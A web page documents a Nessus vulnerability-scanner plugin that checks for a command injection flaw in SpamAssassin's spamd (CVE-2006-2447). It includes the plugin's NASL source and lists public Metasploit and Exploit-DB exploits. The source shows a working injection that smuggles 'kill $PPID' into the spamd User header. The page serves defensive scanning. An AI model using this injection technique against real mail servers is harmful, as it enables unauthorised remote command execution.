SpamAssassin spamd Crafted Message Arbitrary Command Execution - Nessus

Medium   Plugin ID: 21673

This page contains detailed information about the SpamAssassin spamd Crafted Message Arbitrary Command Execution Nessus plugin including available exploits and PoCs found on GitHub, in Metasploit or Exploit-DB for verifying of this vulnerability.

Table Of Contents
hide

Plugin Overview

ID: 21673
Name: SpamAssassin spamd Crafted Message Arbitrary Command Execution
Filename: spamd_vpopmail_cmd_exec.nasl
Vulnerability Published: 2006-06-06
This Plugin Published: 2006-06-08
Last Modification Time: 2018-11-15
Plugin Version: 1.17
Plugin Type: remote
Plugin Family: Gain a shell remotely
Dependencies: find_service2.nasl

Vulnerability Information

Severity: Medium
Vulnerability Published: 2006-06-06
Patch Published: N/A
CVE [?]: CVE-2006-2447
CPE [?]: cpe:/a:apache:spamassassin

Synopsis

The remote server allows execution of arbitrary commands.

Description

The remote host is running spamd, a daemon belonging to SpamAssassin and used to determine whether messages represent spam.

The installed version of spamd on the remote host appears to allow an unauthenticated user to execute arbitrary commands, subject to the privileges of the user under which it operates.

Solution

Upgrade to SpamAssassin 3.0.6 / 3.1.3 or later.

Public Exploits

Target Network Port(s): 783
Target Asset(s): Services/spamd
Exploit Available: True (Metasploit Framework, Exploit-DB)
Exploit Ease: Exploits are available

Here's the list of publicly known exploits and PoCs for verifying the SpamAssassin spamd Crafted Message Arbitrary Command Execution vulnerability:

  1. Metasploit: exploit/unix/misc/spamassassin_exec
    [SpamAssassin spamd Remote Command Execution]
  2. Exploit-DB: exploits/unix/remote/9914.rb
    [EDB-9914: SpamAssassin spamd 3.1.3 - Command Injection (Metasploit)]
  3. Exploit-DB: exploits/linux/remote/16920.rb
    [EDB-16920: SpamAssassin spamd - Remote Command Execution (Metasploit)]

Before running any exploit against any system, make sure you are authorized by the owner of the target system(s) to perform such activity. In any other case, this would be considered as an illegal activity.

WARNING: Beware of using unverified exploits from sources such as GitHub or Exploit-DB. These exploits and PoCs could contain malware. For more information, see how to use exploits safely.

Risk Information

CVSS V2 Vector [?]: AV:N/AC:H/Au:N/C:P/I:P/A:P/E:F/RL:OF/RC:C
CVSS Base Score:5.1 (Medium)
Impact Subscore:6.4
Exploitability Subscore:4.9
CVSS Temporal Score:4.2 (Medium)
CVSS Environmental Score:NA (None)
Modified Impact Subscore:NA
Overall CVSS Score:4.2 (Medium)

Go back to menu.

Plugin Source

This is the spamd_vpopmail_cmd_exec.nasl nessus plugin source code. This script is Copyright (C) 2006-2018 Tenable Network Security, Inc. 

#
# (C) Tenable Network Security
#


include("compat.inc");

if (description)
{
  script_id(21673);
  script_version("1.17");

  script_cve_id("CVE-2006-2447");
  script_bugtraq_id(18290);

  script_name(english:"SpamAssassin spamd Crafted Message Arbitrary Command Execution");
  script_summary(english:"Checks for an command execution flaw in spamd");

 script_set_attribute(attribute:"synopsis", value:
"The remote server allows execution of arbitrary commands." );
 script_set_attribute(attribute:"description", value:
"The remote host is running spamd, a daemon belonging to SpamAssassin
and used to determine whether messages represent spam. 

The installed version of spamd on the remote host appears to allow an
unauthenticated user to execute arbitrary commands, subject to the
privileges of the user under which it operates." );
 script_set_attribute(attribute:"see_also", value:"https://spamassassin.apache.org/404.html" );
 script_set_attribute(attribute:"solution", value:
"Upgrade to SpamAssassin 3.0.6 / 3.1.3 or later." );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
 script_set_attribute(attribute:"metasploit_name", value:'SpamAssassin spamd Remote Command Execution');
 script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
 script_set_attribute(attribute:"plugin_publication_date", value: "2006/06/08");
 script_set_attribute(attribute:"vuln_publication_date", value: "2006/06/06");
 script_cvs_date("Date: 2018/11/15 20:50:22");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe", value:"cpe:/a:apache:spamassassin");
script_end_attributes();

 
  script_category(ACT_ATTACK);
  script_family(english:"Gain a shell remotely");

  script_copyright(english:"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.");

  script_dependencies("find_service2.nasl");
  script_require_ports("Services/spamd", 783);

  exit(0);
}


include("global_settings.inc");


port = get_kb_item("Services/spamd");
if (!port) port = 783;
if (!get_port_state(port)) exit(0);


# A sample email.
msg = string(
  "From: nessus\n",
  "To: root\n",
  "Subject: Test\n",
  "Date: Wed, 07 Jun 2006 10:18:42 -0400\n",
  "\n",
  "A simple test of ", SCRIPT_NAME, ".\n"
);


# Make sure spamd works.
soc = open_sock_tcp(port);
if (soc)
{
  req = string(
    "PROCESS SPAMC/1.2\r\n",
    "Content-length: ", strlen(msg), "\r\n",
    "User: nessus\r\n",
    "\r\n",
    msg
  );
  send(socket:soc, data:req);
  res = recv(socket:soc, length:1024);
  close(soc);
}


# If it does...
if (res && egrep(pattern:"^SPAMD/[^ ]+ [0-9]+ EX_OK", string:res))
{
  # Make sure the version looks vulnerable, unless we're paranoid.
  if (
    report_paranoia < 2 &&
    "X-Spam-Checker-Version:" >< res &&
    !egrep(pattern:"^X-Spam-Checker-Version: SpamAssassin ([0-2]\.|3\.(0\.[0-5]|1\.[0-2]))", string:res)
  ) exit(0);

  # Now try to exploit the flaw to kill our connection.
  soc = open_sock_tcp(port);
  if (soc)
  {
    req = string(
      "PROCESS SPAMC/1.2\r\n",
      "Content-length: ", strlen(msg), "\r\n",
      "User: nessus; kill $PPID\r\n",
      "\r\n",
      msg
    );
    send(socket:soc, data:req);
    res2 = recv(socket:soc, length:1024);

    # There's a problem if we didn't receive anything this time.
    if (res2 == NULL) security_warning(port);
  }
}

The latest version of this script can be found in these locations depending on your platform:

  • Linux / Unix:
    /opt/nessus/lib/nessus/plugins/spamd_vpopmail_cmd_exec.nasl
  • Windows:
    C:\ProgramData\Tenable\Nessus\nessus\plugins\spamd_vpopmail_cmd_exec.nasl
  • Mac OS X:
    /Library/Nessus/run/lib/nessus/plugins/spamd_vpopmail_cmd_exec.nasl

Go back to menu.

How to Run

Here is how to run the SpamAssassin spamd Crafted Message Arbitrary Command Execution as a standalone plugin via the Nessus web user interface (https://localhost:8834/):

  1. Click to start a New Scan.
  2. Select Advanced Scan.
  3. Navigate to the Plugins tab.
  4. On the top right corner click to Disable All plugins.
  5. On the left side table select Gain a shell remotely plugin family.
  6. On the right side table select SpamAssassin spamd Crafted Message Arbitrary Command Execution plugin ID 21673.
  7. Specify the target on the Settings tab and click to Save the scan.
  8. Run the scan.

Here are a few examples of how to run the plugin in the command line. Note that the examples below demonstrate the usage on the Linux / Unix platform.

Basic usage:

/opt/nessus/bin/nasl spamd_vpopmail_cmd_exec.nasl -t <IP/HOST>

Run the plugin with audit trail message on the console:

/opt/nessus/bin/nasl -a spamd_vpopmail_cmd_exec.nasl -t <IP/HOST>

Run the plugin with trace script execution written to the console (useful for debugging):

/opt/nessus/bin/nasl -T - spamd_vpopmail_cmd_exec.nasl -t <IP/HOST>

Run the plugin with using a state file for the target and updating it (useful for running multiple plugins on the target):

/opt/nessus/bin/nasl -K /tmp/state spamd_vpopmail_cmd_exec.nasl -t <IP/HOST>

Go back to menu.

References

BID | SecurityFocus Bugtraq ID: See also: Similar and related Nessus plugins:
  • 21999 - CentOS 4 : spamassassin (CESA-2006:0543)
  • 22632 - Debian DSA-1090-1 : spamassassin - programming error
  • 24118 - Fedora Core 5 : spamassassin-3.1.3-1.fc5 (2006-598)
  • 24361 - Fedora Core 5 : spamassassin-3.1.8-1.fc5 (2007-242)
  • 25509 - Fedora Core 5 : spamassassin-3.1.9-1.fc5.1 (2007-584)
  • 21702 - GLSA-200606-09 : SpamAssassin: Execution of arbitrary code
  • 21718 - Mandrake Linux Security Advisory : spamassassin (MDKSA-2006:103)
  • 21672 - RHEL 4 : spamassassin (RHSA-2006:0543)
  • 27449 - openSUSE 10 Security Update : spamassassin (spamassassin-1904)
  • 118938 - Debian DLA-1578-1 : spamassassin security update
  • 117721 - FreeBSD : spamassassin -- multiple vulnerabilities (613193a0-c1b4-11e8-ae2d-54e1ad3d6335)
  • 119703 - GLSA-201812-07 : SpamAssassin: Multiple vulnerabilities
  • 127739 - openSUSE Security Update : spamassassin (openSUSE-2019-1831)
  • 127038 - SUSE SLED12 / SLES12 Security Update : spamassassin (SUSE-SU-2019:1961-1)
  • 127751 - SUSE SLED15 / SLES15 Security Update : spamassassin (SUSE-SU-2019:2011-1)
  • 53641 - HP Data Protector Remote Command Execution
  • 11023 - Linux lpd DVI Print Filter (dvips) Remote Command Execution
  • 10522 - LPRng use_syslog() Remote Format String Arbitrary Command Execution
  • 11841 - Solaris sadmind AUTH_SYS Credential Remote Command Execution
  • 11513 - Solaris in.lpd Crafted Job Request Arbitrary Remote Command Execution
  • 35308 - TCL Shell (tclsh) Arbitrary Command Execution
  • 10709 - BSD Based telnetd telrcv Function Remote Command Execution
  • 31419 - Versant Connection Services Daemon Arbitrary Command Execution

Version

This page has been produced using Nessus Professional 10.1.2 (#68) LINUX, Plugin set 202205072148.
Plugin file spamd_vpopmail_cmd_exec.nasl version 1.17. For more plugins, visit the Nessus Plugin Library.

Go back to menu.